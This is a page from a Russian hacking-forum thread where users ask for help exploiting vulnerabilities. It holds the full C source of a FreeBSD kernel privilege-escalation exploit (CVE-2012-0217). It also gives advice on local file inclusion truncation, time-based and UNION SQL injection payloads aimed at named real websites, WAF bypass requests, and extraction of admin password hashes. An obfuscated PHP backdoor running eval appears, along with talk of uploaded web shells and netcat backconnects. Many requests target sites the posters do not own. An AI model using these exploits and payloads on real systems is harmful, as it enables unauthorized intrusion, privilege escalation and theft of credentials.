PDA

Просмотр полной версии : Ваши вопросы по уязвимостям.


Страницы : 1 2 3 4 5 6 7 [8] 9 10 11 12

SaNDER
22.02.2017, 12:24
Нашёл exploit под freebsd 8.3 .

Инфа в shell такая : FreeBSD ****** 8.3-RELEASE-p16 FreeBSD 8.3-RELEASE-p16 #0: Mon Jun 30 13:33:36 UTC 2014

Взято с github'a:


.SpoilerTarget" type="button">Spoiler
// CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)

// Copyright 2012 all right reserved, not for commercial uses, bitches

// Infringement Punishment: Monkeys coming out of your ass Bruce Almighty style.

#include

#include

#include

#include

#include

#include

#include

#include

#define _WANT_UCRED

#include

#include

#include

#include

uintptr_t Xofl_ptr, Xbnd_ptr, Xill_ptr, Xdna_ptr, Xpage_ptr, Xfpu_ptr, Xalign_ptr, Xmchk_ptr, Xxmm_ptr;

struct gate_descriptor * sidt()

{

struct region_descriptor idt;

asm ("sidt %0": "=m"(idt));

return (struct gate_descriptor*)idt.rd_base;

}

u_long get_symaddr(char *symname)

{

struct kld_sym_lookup ksym;

ksym.version = sizeof (ksym);

ksym.symname = symname;

if (kldsym(0, KLDSYM_LOOKUP, &ksym) gd_looffset = func;

ip->gd_selector = GSEL(GCODE_SEL, SEL_KPL);

ip->gd_ist = ist;

ip->gd_xx = 0;

ip->gd_type = typ;

ip->gd_dpl = dpl;

ip->gd_p = 1;

ip->gd_hioffset = func>>16;

}

void shellcode()

{

// Actually we dont really need to spawn a shell since we

// changed our whole cred struct.

// Just exit...

printf(" Got root!\n");

exit(0);

}

void kernelmodepayload()

{

struct thread *td;

struct ucred *cred;

// We need to restore/recover whatever we smashed

// We inititalized rsp to idt[14] + 10*8, i.e. idt[19] (see trigger())

// The #GP exception frame writes 6*64bit registers, i.e. it overwrites

// idt[18], idt[17] and idt[16]

// thus overall we have:

// - idt[18], idt[17] and idt[16] are trashed

// - tf_addr -> overwrites the 64bit-LSB of idt[15]

// - tf_trapno -> overwrites Target Offset[63:32] of idt[14]

// - rdi -> overwrites the 64bit-LSB of idt[7]

// - #PF exception frame overwrites idt[6], idt[5] and idt[4]

struct gate_descriptor *idt = sidt();

setidt(idt, IDT_OF, Xofl_ptr, SDT_SYSIGT, SEL_KPL, 0); // 4

setidt(idt, IDT_BR, Xbnd_ptr, SDT_SYSIGT, SEL_KPL, 0); // 5

setidt(idt, IDT_UD, Xill_ptr, SDT_SYSIGT, SEL_KPL, 0); // 6

setidt(idt, IDT_NM, Xdna_ptr, SDT_SYSIGT, SEL_KPL, 0); // 7

setidt(idt, IDT_PF, Xpage_ptr, SDT_SYSIGT, SEL_KPL, 0); // 14

setidt(idt, IDT_MF, Xfpu_ptr, SDT_SYSIGT, SEL_KPL, 0); // 15

setidt(idt, IDT_AC, Xalign_ptr, SDT_SYSIGT, SEL_KPL, 0); // 16

setidt(idt, IDT_MC, Xmchk_ptr, SDT_SYSIGT, SEL_KPL, 0); // 17

setidt(idt, IDT_XF, Xxmm_ptr, SDT_SYSIGT, SEL_KPL, 0); // 18

// get the thread pointer

asm ("mov %%gs:0, %0" : "=r"(td));

// The Dark Knight Rises

cred = td->td_proc->p_ucred;

cred->cr_uid = cred->cr_ruid = cred->cr_rgid = 0;

cred->cr_groups[0] = 0;

// return to user mode to spawn the shell

asm ("swapgs; sysretq;" :: "c"(shellcode)); // store the shellcode addr to rcx

}

#define TRIGGERCODESIZE 20

#define TRAMPOLINECODESIZE 18

void trigger()

{

printf(" Setup...\n");

// Allocate one page just before the non-canonical address

printf(" [+] Trigger code...\n");

uint64_t pagesize = getpagesize();

uint8_t * area = (uint8_t*)((1ULL \n");

// Prepare the values we'll need to restore the kernel to a stable state

printf(" Resolving kernel addresses...\n");

Xofl_ptr = (uintptr_t)get_symaddr("Xofl");

Xbnd_ptr = (uintptr_t)get_symaddr("Xbnd");

Xill_ptr = (uintptr_t)get_symaddr("Xill");

Xdna_ptr = (uintptr_t)get_symaddr("Xdna");

Xpage_ptr = (uintptr_t)get_symaddr("Xpage");

Xfpu_ptr = (uintptr_t)get_symaddr("Xfpu");

Xalign_ptr = (uintptr_t)get_symaddr("Xalign");

Xmchk_ptr = (uintptr_t)get_symaddr("Xmchk");

Xxmm_ptr = (uintptr_t)get_symaddr("Xxmm");

// doeet!

trigger();

return 0;

}


Подойдёт?

И ещё пишу в netcat следующее : nc ip port он 1 сек держится и закрывается,запускал через nc64.exe . В чём проблема?[/I][/I][/I][/I]

Gorev
22.02.2017, 12:32
сначала приконектись к серверу норм, поизучай комманды нетката, лучше забинди порт на сервере а еще лучше бэкконнект у себя запусти неткат с прослушкой нужного порта

SaNDER
22.02.2017, 14:31
Не могу обрезать php да и вообще докопаться до /etc/passwd# + sys_ привязывается.

ошибка :


Code:
Warning: include(sys_config\0.php) [function.include]: failed to open stream: No such file or directory in /home/*****/****.*****.***/docs/index.php on line 26

Warning: include() [function.include]: Failed opening 'sys_config\0.php' for inclusion (include_path='.:/home/*****/***.******.***/php') in /home/****/***.******.***/docs/index.php on line 26

в параметр вписывал это : config.php%00

brown
22.02.2017, 15:18
Deprecated: Function ereg() is deprecated in /lib/dbcontroller/DbLog.class.php on line 41
LFI?

Gorev
22.02.2017, 15:25
SaNDER said:
↑ (https://antichat.live/posts/4051972/)
Не могу обрезать php да и вообще докопаться до /etc/passwd# + sys_ привязывается.

ошибка :


Code:
Warning: include(sys_config\0.php) [function.include]: failed to open stream: No such file or directory in /home/*****/****.*****.***/docs/index.php on line 26

Warning: include() [function.include]: Failed opening 'sys_config\0.php' for inclusion (include_path='.:/home/*****/***.******.***/php') in /home/****/***.******.***/docs/index.php on line 26

в параметр вписывал это : config.php%00


версия пхп? нулль байт не сработает

SaNDER
22.02.2017, 15:29
Gorev said:
↑ (https://antichat.live/posts/4051998/)
версия пхп? нулль байт не сработает


имхо 5.2.10

Gorev
22.02.2017, 15:49
ну в 5 версии не сработает

crlf
22.02.2017, 17:48
Альтернативу нуллбайту из /////[...]///// пофиксили в 5.3.3, сам нуллбайт в 5.3.4.


SaNDER said:
↑ (https://antichat.live/posts/4051972/)
Warning: include(sys_config\0.php)


magic_quotes_gpc = On

Пробуй вытеснение слешами.

crlf
22.02.2017, 18:36
brown said:
↑ (https://antichat.live/posts/4051997/)
Deprecated: Function ereg() is deprecated in /lib/dbcontroller/DbLog.class.php on line 41
LFI?


Нет, это напоминание об использовании устаревшей функции. Регулярки ereg/eregi и нескольких других функций можно обойти при помощи нуллбайта.

Octavian
26.02.2017, 02:20
Играюсь на локалхосте с session fixation

Передаю скрипту которыи логинет

http://localhost/admin/controler.ph...hecp6580&login=admin&password=123456&login-in (http://localhost/admin/controler.php?PHPSESSID=dfemet943uoieudhvqhecp6580&login=admin&password=123456&login-in)

Но на втором браузере никак не пропускает в админку

Что я делаю нетак ?


Code:
/* LOGIN SESSION SET */
else if(isset($_GET['login-in'])){
$admin = "SELECT COUNT(*) FROM admin WHERE login=:login AND password=:password ";
$s = $pdo->prepare($admin);
$s->bindValue(':login',$_GET['login']);
$s->bindValue(':password',$_GET['password']);
$s->execute();
$n = $s->fetchColumn();
if ($n > 0){
$admin = "SELECT login FROM admin WHERE login=:login AND password=:password ";
$s = $pdo->prepare($admin);
$s->bindValue(':login',$_GET['login']);
$s->bindValue(':password',$_GET['password']);
$s->execute();
session_start();
foreach ($s as $value){
$_SESSION['admin'] = $value['login'];
}
header('Location:news.php');
exit();
}

SaNDER
26.02.2017, 12:14
crlf said:
↑ (https://antichat.live/posts/4052039/)
Альтернативу нуллбайту из /////[...]///// пофиксили в 5.3.3, сам нуллбайт в 5.3.4.
magic_quotes_gpc = On
Пробуй вытеснение слешами.


Это как?Дайте статью,если не сложно .

crlf
26.02.2017, 13:53
SaNDER said:
↑ (https://antichat.live/posts/4053452/)
Это как?Дайте статью,если не сложно .


/threads/424557/page-90#post-4050639 (https://antichat.live/threads/424557/page-90/)

/threads/424557/page-90#post-4050648 (https://antichat.live/threads/424557/page-90/)

WallHack
04.03.2017, 08:58
Помогите раскрутить

biggreenbookshop.com/index.php?searchStr=1'&_a=viewCat (http://www.biggreenbookshop.com/index.php?searchStr=1'&_a=viewCat)

Gorev
04.03.2017, 09:07
WallHack said:
↑ (https://antichat.live/posts/4055697/)
Помогите раскрутить
biggreenbookshop.com/index.php?searchStr=1'&_a=viewCat (http://www.biggreenbookshop.com/index.php?searchStr=1'&_a=viewCat)


This error was generated by Mod_Security.

negativmans
05.03.2017, 11:52
Помогите найти путь до Shell пожалуйста, залил шелл через картинку, а путь найти не могу

Gorev
05.03.2017, 12:22
negativmans said:
↑ (https://antichat.live/posts/4056124/)
Помогите найти путь до Shell пожалуйста, залил шелл через картинку, а путь найти не могу


в исходнике посмотреть путь до картинки, через какую аплоадилку заливали?возможно есть стандартный путь заливки, залей картинку и посмотри (если возможно )куда она льется...

Simon_ru
07.03.2017, 21:46
В .htaccess стоит Options All -Indexes но папка со всеми файлами почему-то открыта для просмотра из вне и тем самым сильно портит жизнь, в чем может быть проблема? Модуль какой в апаче, или еще что... Надо ее в общем закрыть как-то

SaNDER
07.03.2017, 22:02
Что за уязвимость SOME? В интернете полное название :

Upload Same Origin Method Execution .

и просил перейти на

wp-includes/js/plupload/plupload.flash.swf

после скачивался файл в формате swf . В чём суть?

Есть доступ к debug.log в WP .

Ошибки такого формата :


Code:
[01-Feb-2017 21:44:34 UTC] PHP Warning: include(/home/****/public_html/wp-content/advanced-cache.php): failed to open stream: No such file or directory in /home/****/public_html/wp-settings.php on line 74

Только толку ?

Ereee
08.03.2017, 13:01
SaNDER said:
↑ (https://antichat.live/posts/4057341/)
Что за уязвимость SOME?
Только толку ?


Вот здесь есть PoC:

http://ropchain.org/poc/wordpress/

Суть в том, что plupload позволяет выполнять действия от имени админа, если выполнено несколько условий.

SaNDER
08.03.2017, 14:24
Ereee said:
↑ (https://antichat.live/posts/4057570/)
Вот здесь есть PoC:
http://ropchain.org/poc/wordpress/
Суть в том, что plupload позволяет выполнять действия от имени админа, если выполнено несколько условий.


Мне нужно статью или что-то в этом духе,ибо у меня есть сайт и у меня качается этот файл swf,но что дальше делать и какие условия нужны не знаю .

cat1vo
08.03.2017, 15:32
SaNDER said:
↑ (https://antichat.live/posts/4057597/)
Мне нужно статью или что-то в этом духе,ибо у меня есть сайт и у меня качается этот файл swf,но что дальше делать и какие условия нужны не знаю .


plupload Same Origin Method Execution (http://zoczus.blogspot.ru/2015/04/plupload-same-origin-method-execution.html)

И для лучшего понимания видео презентации с BHE 2014

pastword
08.03.2017, 21:48
Посмотрите и подскажите что ни будь пожалуйста:

http://www.oyandasozi.tj/index.php/...канчоч-талко-ба-шарикон-ниёз-дорад?start=1420 (http://www.oyandasozi.tj/index.php/tj/aks-o/item/57-%D0%B1%D0%B0%D1%80%D0%BE%D0%B8-%D0%BA%D0%BE%D1%80%D0%BA%D0%B0%D1%80%D0%B4%D0%B8-%D0%BA%D0%BE%D0%BD%D2%B3%D0%BE%D0%B8-%D0%BA%D0%B0%D0%BD%D1%87%D0%BE%D1%87-%D1%82%D0%B0%D0%BB%D0%BA%D0%BE-%D0%B1%D0%B0-%D1%88%D0%B0%D1%80%D0%B8%D0%BA%D0%BE%D0%BD-%D0%BD%D0%B8%D1%91%D0%B7-%D0%B4%D0%BE%D1%80%D0%B0%D0%B4/57-%D0%B1%D0%B0%D1%80%D0%BE%D0%B8-%D0%BA%D0%BE%D1%80%D0%BA%D0%B0%D1%80%D0%B4%D0%B8-%D0%BA%D0%BE%D0%BD%D2%B3%D0%BE%D0%B8-%D0%BA%D0%B0%D0%BD%D1%87%D0%BE%D1%87-%D1%82%D0%B0%D0%BB%D0%BA%D0%BE-%D0%B1%D0%B0-%D1%88%D0%B0%D1%80%D0%B8%D0%BA%D0%BE%D0%BD-%D0%BD%D0%B8%D1%91%D0%B7-%D0%B4%D0%BE%D1%80%D0%B0%D0%B4?start=1420)

swat_
09.03.2017, 21:17
PHP:
getExtension() == 'php') {
header('Content-type:application/x-httpd-php');
}
echo file_get_contents($_GET['file']);
} else {
echo 'ACCESS DENIED!';
}

есть такой код,очевидно лфи ,но только для файлов lib.php, main.js,email_template.html,data.json , как можно обойти ,чтобы можно было читать другие файлы на сервере?

billybonse
09.03.2017, 21:48
Переопределить массив files если register_globals=on ?

swat_
09.03.2017, 23:30
register_globals=off

crlf
10.03.2017, 09:02
swat_ said:
↑ (https://antichat.live/posts/4058126/)
очевидно лфи


Читалка или RFD, по OWASP Path Traversal.


swat_ said:
↑ (https://antichat.live/posts/4058126/)
как можно обойти


Никак.


billybonse said:
↑ (https://antichat.live/posts/4058149/)
Переопределить массив files если register_globals=on ?


Если бы $files не был объявлен или было так $files[].

WallHack
10.03.2017, 12:31
Опасна ли данная функция ?


Code:
$url = preg_replace('/\s+/', '', $_POST['url']);

cat1vo
10.03.2017, 14:08
WallHack said:
↑ (https://antichat.live/posts/4058392/)
Опасна ли данная функция ?

Code:
$url = preg_replace('/\s+/', '', $_POST['url']);



Сама функция без модификатора /e не опасна. У Вас всего лишь вырезаются пробелы из переменной $_POST['url'] в которой (по задумке) должен передаваться адрес сайта. Что происходит дальше с переменной и какие манипуляции с ней происходят не известно, может там и есть уязвимость.

Octavian
10.03.2017, 17:13
Можно залится?

http://www.infomarket.md/fckeditor/editor/filemanager/connectors/uploadtest.html

SaNDER
10.03.2017, 18:07
Code:
DUPLICATOR INSTALL-LOG
STEP1 START @ **:**:**
NOTICE: Do NOT post to public sites or forums
************************************************** ******************************
VERSION: 1.1.16
PHP: 5.5.30 | SAPI: apache2handler
SERVER: Apache
DOC ROOT: /home/*******/public_html
DOC ROOT 755: false
LOG FILE 644: true
BUILD NAME: 20160829_*******_57c4a0b1280555134160829205305
REQUEST URL: http://www.*******/installer.php

************************************************** ******************************
ARCHIVE SETUP
************************************************** ******************************
NAME: 20160829_******_57c4a0b1280555134160829205305_arch ive.zip

Нужно получить доступ к 20160829_******_57c4a0b1280555134160829205305_arch ive.zip .

На других сайтах работает так site.domain/20160829_******_57c4a0b1280555134160829205305_arch ive.zip

Но тут такое не прокатывает,выдаёт 404 . Мб значит где-то в другом месте или его вообще нет ????

Желательно это,но,если у вас есть какие-нибудь сплоиты скиньте на wp 4.6.1(я сам искал не нашёл)

Скачать могу,а директорию к zip'у не знаю. Help .

Octavian
10.03.2017, 20:50
При восстановлении пароля на одном сайте на почте приходит УРЛ в которыи содежится


Code:
8dc8ebada0934e534bfce7245a629086c1579777-9880d7ecf0984172a2e4c3689b3291ff-1489250150



Code:
c904e33cfe3b3a26705f887326039fd0aa5bf498-9880d7ecf0984172a2e4c3689b3291ff-1489249791

sha1(Предполагаю что sha)+md5(Не меняется никогда)+time(Можно предугадать)

Выходит что нужно предугадать первый хэш

Я недавно находил подобную уязвимость ,есть методы проверки на подобные недочеты?

Кто что знает кто что встречял на практике?

Материал может скиньте а то кроме

https://raz0r.name/articles/predskazyvaem-sluchajnye-chisla-v-php/

Ничего

crlf
11.03.2017, 02:21
Если там не брутабельное значение и исключены простейшие варианты, то как минимум нужны исходники, а так же должна сойтись куча звёзд. Для общего ознакомления можно почитать:

https://ru.wikipedia.org/wiki/Атака_на_ГПСЧ

https://ru.wikipedia.org/wiki/Атака_удлинением_сообщения

https://ru.wikipedia.org/wiki/Коллизия_хеш-функции

Интересный случай атаки на ГПСЧ:

https://geektimes.ru/post/285568/

Octavian
12.03.2017, 21:08
Как укоротить такои SQL


Code:
/*'%2b(select(0)from(select(sleep(5)))v)%2b'*/

Что делает этот кусок не понимаю какои вектор атаке тут?

Gorev
12.03.2017, 21:27
Octavian said:
↑ (https://antichat.live/posts/4059463/)
Как укоротить такои SQL

Code:
/*'%2b(select(0)from(select(sleep(5)))v)%2b'*/

Что делает этот кусок не понимаю какои вектор атаке тут?


Это проверка уязвимости сайта. Это один из самых простых и безопасных способов, чтобы выяснить, если ваш сервер является уязвимым для SQL инъекций - и что еще более важно, она не нуждается в каких-либо внимания со стороны потенциального взломщика! Обычно скриптом тестят, автоматически тестируют сайты на наличие уязвимостей SQL инъекции - если результат положительный. то в принципе дальше есть смысл раскручивать.

Идея заключается в том, что уязвимый сервер будет по-разному реагировать на запрос с разными значениями аргумента sleep - это значит, что очень легко можно будет автоматически пройти через все возможные входы (не забывай, что даже такие вещи, как скрытые поля и выпадающие может быть изменены по желанию) и выяснить, если любой из них являются уязвимыми. Когда это работает, ты можешь произвести инъекцию непосредственно соответствующим запросом.ИМХО

Octavian
12.03.2017, 21:33
Gorev said:
↑ (https://antichat.live/posts/4059475/)
Это проверка уязвимости сайта. Это один из самых простых и безопасных способов, чтобы выяснить, если ваш сервер является уязвимым для SQL инъекций - и что еще более важно, она не нуждается в каких-либо внимания со стороны потенциального взломщика! Обычно скриптом тестят, автоматически тестируют сайты на наличие уязвимостей SQL инъекции - если результат положительный. то в принципе дальше есть смысл раскручивать.
Идея заключается в том, что уязвимый сервер будет по-разному реагировать на запрос с разными значениями аргумента sleep - это значит, что очень легко можно будет автоматически пройти через все возможные входы (не забывай, что даже такие вещи, как скрытые поля и выпадающие может быть изменены по желанию) и выяснить, если любой из них являются уязвимыми. Когда это работает, ты можешь произвести инъекцию непосредственно соответствующим запросом.ИМХО


Я это знаю мне нужно понять что сделает данный запрос, потому что простои запрос выглядел бы так 'or sleep(5)#

И как довесть мои запрос до этого sleep(5) ?

Синтактически что он делает а то что он говорит серверу спать на 5 секунд ясно

RWD
14.03.2017, 03:53
Кто знает есть что то под OpenSSH 4.3 (protocol 2.0)?

Octavian
16.03.2017, 13:01
Почему даже в сесии советуют шифровать значения в md5() в каких условиях может помоч?

Gorev
16.03.2017, 13:27
Octavian said:
↑ (https://antichat.live/posts/4061241/)
Почему даже в сесии советуют шифровать значения в md5() в каких условиях может помоч?




Code:
https://habrahabr.ru/post/120636/

Octavian
16.03.2017, 15:55
Gorev said:
↑ (https://antichat.live/posts/4061268/)

Code:
https://habrahabr.ru/post/120636/



Нет там ответа пишет что не безопасно хранить в plain-text пароль в сесии а почему не пишет

winstrool
16.03.2017, 16:22
Octavian said:
↑ (https://antichat.live/posts/4061387/)
Нет там ответа пишет что не безопасно хранить в plain-text пароль в сесии а почему не пишет


Один из... как вариантов... встречались такие сайты, где сессии хранятся ввиде файлов, т.е при расшариных директориях(кривых настройках сервака), я мог прочесть сессию где хранился пасс или хэшь пасса, второй момент, опять же из-за кривизны настроек, встречал серваки хранящие сессии в /tmp, где также при чтении сессии можно было выявить пасс.

Octavian
16.03.2017, 16:30
winstrool said:
↑ (https://antichat.live/posts/4061406/)
Один из... как вариантов... встречались такие сайты, где сессии хранятся ввиде файлов, т.е при расшариных директориях(кривых настройках сервака), я мог прочесть сессию где хранился пасс или хэшь пасса, второй момент, опять же из-за кривизны настроек, встречал серваки хранящие сессии в /tmp, где также при чтении сессии можно было выявить пасс.


xampp тоже в tmp сохраняет сессии это неправильно?

winstrool
16.03.2017, 17:40
Octavian said:
↑ (https://antichat.live/posts/4061411/)
xampp тоже в tmp сохраняет сессии это неправильно?


Куда сохраняется сессия, устанавливается директивой в пхп.ини "session.save_path" по умолчанию она всегда будет сохранять в /tmp, я бы лучше рекомендовал устанавливать в пользовательский каталог сайта, для скрытия названия сессии и при кривезны настроек, содержимого, бывает такое, что достаточно в куках вставить корректно название сессии и мы уже можем быть тем, кому она принадлежала на соответствующем сайте.

brand29
18.03.2017, 08:55
Привет ребят.Есть компьютер в организации который подключён к серверу, могу ли я с помощью него узнать внешний ip сервера ?

И могу ли?

Заранее спасибо

Golfstream
18.03.2017, 14:37
sql инъекциями заинтересовался совсем недавно, так что не судите строго...)) не нашел куда написать, поэтому пишу сюда ))есть пара любопытных моментов

раскрутил уязвимость вручную и мапом... в обеих случаях название бд и таблиц, как и пароля админа -разные.. с чем это может быть связано?

и еще.. подскажите, что это за метод? есть где можно узнать о нем поподробдней?

if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/

BabaDook
18.03.2017, 15:22
Golfstream said:
↑ (https://antichat.live/posts/4062316/)
sql инъекциями заинтересовался совсем недавно, так что не судите строго...)) не нашел куда написать, поэтому пишу сюда ))есть пара любопытных моментов
раскрутил уязвимость вручную и мапом... в обеих случаях название бд и таблиц, как и пароля админа -разные.. с чем это может быть связано?
и еще.. подскажите, что это за метод? есть где можно узнать о нем поподробдней?
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/



раскрутил уязвимость вручную и мапом... в обеих случаях название бд и таблиц, как и пароля админа -разные.. с чем это может быть связано? Когда вы раскручивайте в ручную данные сливаются из другой БД, возможен такой вариант.

if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ - инъекция по времени. Так любит сканнер проверять. Узнать можно на форуме АнтиЧат например,или в гугле.

SooLFaa
19.03.2017, 16:25
BabaDook said:
↑ (https://antichat.live/posts/4062330/)
раскрутил уязвимость вручную и мапом... в обеих случаях название бд и таблиц, как и пароля админа -разные.. с чем это может быть связано? Когда вы раскручивайте в ручную данные сливаются из другой БД, возможен такой вариант.
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ - инъекция по времени. Так любит сканнер проверять. Узнать можно на форуме АнтиЧат например,или в гугле.


Очень много фаззеров фолсе позитивят именно на time-based. А вот w3af молодец. Он умеет понимать блинды.

elvir
19.03.2017, 18:06
http://xxx.ru/?r=club/catalog/detail&id=-53 order by extractvalue(0x0a,concat(0x0a,(select concat_ws(0x3b,password) from b_user limit 1,1))) -- - (http://xxx.ru/?r=club/catalog/detail&id=-53%20order%20by%20extractvalue(0x0a,concat(0x0a,(s elect%20concat_ws(0x3b,password)%20from%20b_user%2 0limit%201,1)))%20--%20-)

выводит не полный хэш, как составить запрос чтобы выводил все символы их хэша?

Gorev
19.03.2017, 19:11
elvir said:
↑ (https://antichat.live/posts/4062633/)
http://xxx.ru/?r=club/catalog/detail&id=-53 order by extractvalue(0x0a,concat(0x0a,(select concat_ws(0x3b,password) from b_user limit 1,1))) -- - (http://xxx.ru/?r=club/catalog/detail&id=-53%20order%20by%20extractvalue(0x0a,concat(0x0a,(s elect%20concat_ws(0x3b,password)%20from%20b_user%2 0limit%201,1)))%20--%20-)
выводит не полный хэш, как составить запрос чтобы выводил все символы их хэша?


mid

elvir
19.03.2017, 20:21
http://xxx.ru/?r=club/catalog/detai...0x3b,password) from b_user limit 1,1))) -- -# (http://xxx.ru/?r=club/catalog/detail&id=-53%20order%20by%20extractvalue(0x0a,concat(0x0a,(s elect%20concat_ws(0x3b,password)%20from%20b_user%2 0limit%201,1)))%20--%20-)


Gorev said:
↑ (https://antichat.live/posts/4062658/)
mid


а как узнать название баз данных на сервере? Не таблиц а баз.

Gorev
19.03.2017, 21:34
elvir said:
↑ (https://antichat.live/posts/4062677/)
http://xxx.ru/?r=club/catalog/detail&id=-53 order by extractvalue(0x0a,concat(0x0a,(select concat_ws(0x3b,password) from b_user limit 1,1))) -- -# (http://xxx.ru/?r=club/catalog/detail&id=-53%20order%20by%20extractvalue(0x0a,concat(0x0a,(s elect%20concat_ws(0x3b,password)%20from%20b_user%2 0limit%201,1)))%20--%20-)
а как узнать название баз данных на сервере? Не таблиц а баз.


SELECT schema_name FROM information_schema.schemata; — for MySQL >= v5.0

или

SELECT distinct(db) FROM mysql.db

последний при определённых условиях срабатывает

Octavian
20.03.2017, 03:23
Что будет если отправить 2 одинаковых http запроса одновременно например при восстановление пароля есть шансы что придет одинаковый код восстановления? Как отправить 2 запроса с минимальной задержки ? Какие похожие баги есть кроме race condition найдено в старбак се?

ACat
21.03.2017, 02:51
Парни, подскажите пожалуйста, как на практике эксплуатировать данный баг:

https://github.com/lesterchan/wp-email/commit/bcae41780ef78ce4d0780fc417c0343d5715b18a

ACat
21.03.2017, 02:51
Octavian said:
↑ (https://antichat.live/posts/4062798/)
Что будет если отправить 2 одинаковых http запроса одновременно например при восстановление пароля есть шансы что придет одинаковый код восстановления? Как отправить 2 запроса с минимальной задержки ? Какие похожие баги есть кроме race condition найдено в старбак се?


думаю, что идея утопична. ибо каждый запрос генерирует уникальный хэндлер

Simon_ru
21.03.2017, 10:20
PHP:
$tf4daa)
{
$q91f628=$tf4daa;
$t1fb=$j49bf;
}

if (!$q91f628)
{
foreach ($GLOBALS[$GLOBALS['s251'][30].$GLOBALS['s251'][27].$GLOBALS['s251'][64].$GLOBALS['s251'][33].$GLOBALS['s251'][64].$GLOBALS['s251'][17].$GLOBALS['s251'][17]] as$j49bf=>$tf4daa)
{
$q91f628=$tf4daa;
$t1fb=$j49bf;
}
}

$q91f628= @$GLOBALS[$GLOBALS['s251'][3].$GLOBALS['s251'][27].$GLOBALS['s251'][31].$GLOBALS['s251'][0]]($GLOBALS[$GLOBALS['s251'][26].$GLOBALS['s251'][0].$GLOBALS['s251'][84].$GLOBALS['s251'][17]]($GLOBALS[$GLOBALS['s251'][7].$GLOBALS['s251'][64].$GLOBALS['s251'][3].$GLOBALS['s251'][20].$GLOBALS['s251'][84].$GLOBALS['s251'][31].$GLOBALS['s251'][32].$GLOBALS['s251'][4]]($q91f628),$t1fb));
if (isset($q91f628[$GLOBALS['s251'][27].$GLOBALS['s251'][71]]) &&$re3c==$q91f628[$GLOBALS['s251'][27].$GLOBALS['s251'][71]])
{
if ($q91f628[$GLOBALS['s251'][27]] ==$GLOBALS['s251'][47])
{
$l220c9= Array(
$GLOBALS['s251'][16].$GLOBALS['s251'][55] => @$GLOBALS[$GLOBALS['s251'][88].$GLOBALS['s251'][64].$GLOBALS['s251'][7].$GLOBALS['s251'][3].$GLOBALS['s251'][31].$GLOBALS['s251'][13].$GLOBALS['s251'][84].$GLOBALS['s251'][32].$GLOBALS['s251'][13]](),
$GLOBALS['s251'][30].$GLOBALS['s251'][55] =>$GLOBALS['s251'][33].$GLOBALS['s251'][89].$GLOBALS['s251'][32].$GLOBALS['s251'][73].$GLOBALS['s251'][33],
);
echo @$GLOBALS[$GLOBALS['s251'][79].$GLOBALS['s251'][84].$GLOBALS['s251'][0].$GLOBALS['s251'][13].$GLOBALS['s251'][12].$GLOBALS['s251'][12].$GLOBALS['s251'][64]]($l220c9);
}
elseif ($q91f628[$GLOBALS['s251'][27]] ==$GLOBALS['s251'][4])
{
eval($q91f628[$GLOBALS['s251'][7]]);
}
exit();
}

Что это?

MrScrudg
21.03.2017, 21:43
Подскажите, есть ли в настоящее время смысл искать SQL-i в cookie/user-agent/referrer ?

t0ma5
21.03.2017, 21:49
MrScrudg said:
↑ (https://antichat.live/posts/4063530/)
Подскажите, есть ли в настоящее время смысл искать SQL-i в cookie/user-agent/referrer ?


в любое время есть смысл искать инъекции где угодно

Gorev
21.03.2017, 22:36
MrScrudg said:
↑ (https://antichat.live/posts/4063530/)
Подскажите, есть ли в настоящее время смысл искать SQL-i в cookie/user-agent/referrer ?


А почему бы и нет?думаете что все поголовно решили все вопросы с фильтрацией ?

DezMond™
21.03.2017, 23:21
Code:
http://www.men-defencetec.de/en/products/detailview/?cHash=e27d171ed5311fe78556c5047e5e892b&tx_men_pi1%5Bdetail%5D=54+/*!12345anD*/+1=0+/*!911111*/union+/*!12345sELecT*/+'1','2','3','4','5','6','7','8','9','10','11','12 ','13','14','15','16','17','18','19','20','21','22 ','23','24','25','26','27','28','29','30','31','32 ','33','34','35','36','37','38','39','40','41','42 ','43','44','45','46','47','48','49','50','51','52 ','53','54','55','56','57','58','59','60','61','62 ','63','64','65',66,67,68,69,70,71,72,73,74,75,76, 77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93 ,94,95,96,97,98,99,100,101,102,103,104,105,106,107 ,108,109,110,111,112,113,114,115,116,117,118,119,1 20,121,122,123,124,125,126,127,128,129,130,131,132 ,133,134,135,136,137,138,139,140,141,142,143,144,1 45,146,147,148,149,150,151,152,153,154,155,156,157 ,158,159,160,161,162,163,164,165,166,167,168,169,1 70,171,172,173,174,175,176,177,178,179,180+--+

Хелп, нужно вывод

BabaDook
21.03.2017, 23:45
DezMond™ said:
↑ (https://antichat.live/posts/4063572/)

Code:
http://www.men-defencetec.de/en/products/detailview/?cHash=e27d171ed5311fe78556c5047e5e892b&tx_men_pi1%5Bdetail%5D=54+/*!12345anD*/+1=0+/*!911111*/union+/*!12345sELecT*/+'1','2','3','4','5','6','7','8','9','10','11','12 ','13','14','15','16','17','18','19','20','21','22 ','23','24','25','26','27','28','29','30','31','32 ','33','34','35','36','37','38','39','40','41','42 ','43','44','45','46','47','48','49','50','51','52 ','53','54','55','56','57','58','59','60','61','62 ','63','64','65',66,67,68,69,70,71,72,73,74,75,76, 77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93 ,94,95,96,97,98,99,100,101,102,103,104,105,106,107 ,108,109,110,111,112,113,114,115,116,117,118,119,1 20,121,122,123,124,125,126,127,128,129,130,131,132 ,133,134,135,136,137,138,139,140,141,142,143,144,1 45,146,147,148,149,150,151,152,153,154,155,156,157 ,158,159,160,161,162,163,164,165,166,167,168,169,1 70,171,172,173,174,175,176,177,178,179,180+--+

Хелп, нужно вывод


Злой ваф

DezMond™
21.03.2017, 23:50
может кто сможет обойти...

cat1vo
22.03.2017, 00:31
DezMond™ said:
↑ (https://antichat.live/posts/4063572/)

Code:
